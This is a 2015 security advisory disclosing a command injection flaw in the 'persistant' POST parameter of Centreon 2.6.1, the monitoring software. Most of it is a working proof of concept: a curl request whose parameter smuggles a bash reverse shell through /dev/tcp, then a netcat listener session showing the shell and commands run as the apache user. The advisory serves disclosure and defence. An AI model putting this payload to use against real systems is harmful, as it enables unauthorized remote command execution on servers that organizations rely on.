Centreon 2.6.1 Command Injection
Posted on 29 September 2015
Centreon 2.6.1 Command Injection Vulnerability Vendor: Centreon Product web page: https://www.centreon.com Affected version: 2.6.1 (CES 3.2) Summary: Centreon is the choice of some of the world's largest companies and mission-critical organizations for real-time IT performance monitoring and diagnostics management. Desc: The POST parameter 'persistant' which serves for making a new service run in the background is not properly sanitised before being used to execute commands. This can be exploited to inject and execute arbitrary shell commands as well as using cross-site request forgery attacks. Tested on: CentOS 6.6 (Final) Apache/2.2.15 PHP/5.3.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5265 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5265.php 10.08.2015 -- <<<<<< root@zslab:~# curl -i -s -k -X 'POST' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=bk80lvka1v8sb9ltuivjngo520' --data-binary $'host_id=14&service_id=19&persistant=1%27%22%600%26%2fbin%2fbash+-i+%3e+%2fdev%2ftcp%2f127.0.0.1%2f6161+0%3c%261+2%3e%261%60%27&duration_scale=s&start=08%2f17%2f2018&start_time=8%3a16&end=09%2f17%2f2018&end_time=10%3a16&comment=pwned&submitA=Save&o=as' 'http://localhost.localdomain/centreon/main.php?p=20218' >>>>>> root@zslab:~# nc -4 -l -n 6161 -vv -D Connection from 127.0.0.1 port 6161 [tcp/*] accepted bash: no job control in this shell bash-4.1$ id id uid=48(apache) gid=48(apache) groups=48(apache),494(centreon-engine),496(centreon-broker),498(centreon),499(nagios) bash-4.1$ uname -a;cat /etc/issue uname -a;cat /etc/issue Linux localhost.localdomain 2.6.32-504.16.2.el6.x86_64 #1 SMP Wed Apr 22 06:48:29 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Centreon Enterprise Server Kernel on an m bash-4.1$ pwd pwd /usr/share/centreon/www bash-4.1$ exit exit exit root@zslab:~#